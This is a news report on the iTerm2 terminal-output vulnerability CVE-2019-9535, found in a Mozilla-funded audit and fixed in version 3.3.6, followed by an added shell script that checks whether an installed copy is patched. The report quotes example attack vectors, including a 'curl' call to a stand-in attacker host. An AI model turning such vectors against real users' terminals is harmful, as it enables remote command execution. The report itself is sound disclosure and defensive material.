“We expect the community will find many more creative examples…”
A security audit funded by the Mozilla Open Source Support Program (MOSS) has discovered a critical security bug in iTerm2, a popular open source alternative to Apple’s Terminal that provides a command line interface to the UNIX system underlying macOS.
Mozilla, iTerm2’s developers and Radically Open Security, the not-for-profit security company contracted to probe iTerm2’s security, have urged users to update the software, which has now been patched. The issue had been sitting in the open (hopefully) unnoticed for approximately seven years, they said.
iTerm2 is one of the most popular terminal emulators in the world, and frequently used by developers, Mozilla noted, saying: “MOSS selected iTerm2 for a security audit because it processes untrusted data and it is widely used, including by high-risk targets (like developers and system administrators).”
(Apple’s Terminal is widely looked down upon for lacking various functions. iTerm, by contrast, is seen as hugely feature-rich for power UNIX users.)
Mozilla’s Tom Ritter said: “An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer.
“Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log.”
He added drily: “We expect the community will find many more creative examples.”
MOSS said: “Typically this vulnerability would require some degree of user interaction or trickery; but because it can be exploited via commands generally considered safe there is a high degree of concern about the potential impact.”
The vulnerability has been assigned CVE-2019-9535.
iTerm2’s team said they recommend a proactive immediate update by going to the iTerm2 menu and choosing Check for updates…
The fix is available in version 3.3.6.
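For administrators who need to confirm that the patched release has actually landed on a machine, the following is an added example (not from the article, Mozilla or the iTerm2 project) that reads the installed iTerm2 version and compares it against 3.3.6; it assumes the standard macOS bundle path /Applications/iTerm.app (overridable via ITERM_APP) and the stock PlistBuddy tool.

```shell
#!/bin/sh
# Added example: report whether the installed iTerm2 is at or above the
# patched release 3.3.6 named in the article. Assumes the app bundle is at
# /Applications/iTerm.app unless ITERM_APP is set, and that
# /usr/libexec/PlistBuddy exists (standard on macOS).

FIXED_VERSION="3.3.6"

# version_ge A B: succeed (exit 0) when dotted version A >= B. Components are
# compared numerically one at a time, so 3.3.10 sorts above 3.3.6; any
# non-numeric suffix on a component (e.g. "6beta1") is ignored.
version_ge() {
    a="$1" b="$2"
    while [ -n "$a" ] || [ -n "$b" ]; do
        ai="${a%%.*}"; bi="${b%%.*}"
        # drop the component just read; empty string when none remain
        case "$a" in *.*) a="${a#*.}" ;; *) a="" ;; esac
        case "$b" in *.*) b="${b#*.}" ;; *) b="" ;; esac
        ai="${ai%%[!0-9]*}"; bi="${bi%%[!0-9]*}"
        ai="${ai:-0}"; bi="${bi:-0}"
        if [ "$ai" -gt "$bi" ]; then return 0; fi
        if [ "$ai" -lt "$bi" ]; then return 1; fi
    done
    return 0
}

# installed_iterm2_version: print CFBundleShortVersionString from the bundle,
# failing (exit 1) when the bundle or PlistBuddy is absent.
installed_iterm2_version() {
    plist="${ITERM_APP:-/Applications/iTerm.app}/Contents/Info.plist"
    [ -f "$plist" ] && [ -x /usr/libexec/PlistBuddy ] || return 1
    /usr/libexec/PlistBuddy -c 'Print :CFBundleShortVersionString' "$plist"
}

# iterm2_status VERSION: print "patched" or "vulnerable" for a version string
iterm2_status() {
    if version_ge "$1" "$FIXED_VERSION"; then echo "patched"; else echo "vulnerable"; fi
}

if v="$(installed_iterm2_version)"; then
    echo "iTerm2 $v: $(iterm2_status "$v") (fix shipped in $FIXED_VERSION)"
else
    echo "iTerm2 bundle not found; nothing to check" >&2
fi
```

On a fleet, run it through your management tool and alert on any line containing "vulnerable".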
Netherlands-based Radically Open Security is a not-for-profit computer security company legally established as a ‘Fiscaal Fondsenwervende Instelling’ (fiscal fundraising institution) in the Netherlands. This summer it donated 90 percent of its net profit to an internet charity, NLnet, that supports open source technology and open internet research and development.